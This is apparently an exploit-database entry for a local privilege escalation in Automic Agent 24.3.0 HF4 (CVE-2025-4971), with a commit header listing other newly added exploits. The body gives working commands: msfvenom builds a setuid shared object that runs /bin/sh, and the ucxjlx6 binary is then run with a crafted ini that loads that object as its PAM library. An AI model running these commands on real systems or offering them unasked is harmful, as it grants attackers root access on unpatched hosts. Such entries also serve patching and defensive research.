c3b152279e
7 changes to exploits/shellcodes/ghdb Automic Agent 24.3.0 HF4 - Privilege Escalation Fortra GoAnywhere MFT 7.4.1 - Authentication Bypass SolarWinds Serv-U 15.4.2 HF1 - Directory Traversal Campcodes Online Hospital Management System 1.0 - SQL Injection WordPress Digits Plugin 8.4.6.1 - Authentication Bypass via OTP Bruteforcing Windows File Explorer Windows 11 (23H2) - NTLM Hash Disclosure
13 lines
No EOL
645 B
Text
13 lines
No EOL
645 B
Text
# Exploit Title: Automic Agent 24.3.0 HF4 - Privilege Escalation
|
|
# Date: 26.05.2025
|
|
# Exploit Author: Flora Schäfer
|
|
# Vendor Homepage: https://www.broadcom.com/products/software/automation/automic-automation
|
|
# Version: <24.3.0 HF4, <21.0.13 HF1
|
|
# Tested on: Linux
|
|
# CVE : CVE-2025-4971
|
|
|
|
1. Generate shared object file using msfvenom
|
|
$ msfvenom -p linux/x64/exec PrependSetuid=True PrependSetguid=True CMD="/bin/sh" -f elf-so > /tmp/sh.so
|
|
|
|
2. Run the ucxjlx6 executable as follows
|
|
$ ./ucxjlx6 ini=<(echo -e "[GLOBAL]\nhelplib = /dev/null\nsystem = blep\n[MISC]\nauthentication = PAM\n[PAM]\nlibName = /tmp/sh.so\n[VARIABLES]\nUC_EX_JOB_MD=blep") |